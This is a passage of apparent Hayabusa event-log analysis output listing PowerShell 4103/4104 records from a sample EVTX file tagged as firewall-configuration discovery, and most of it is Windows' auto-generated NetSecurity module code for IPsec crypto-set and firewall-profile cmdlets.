$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallProfile ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 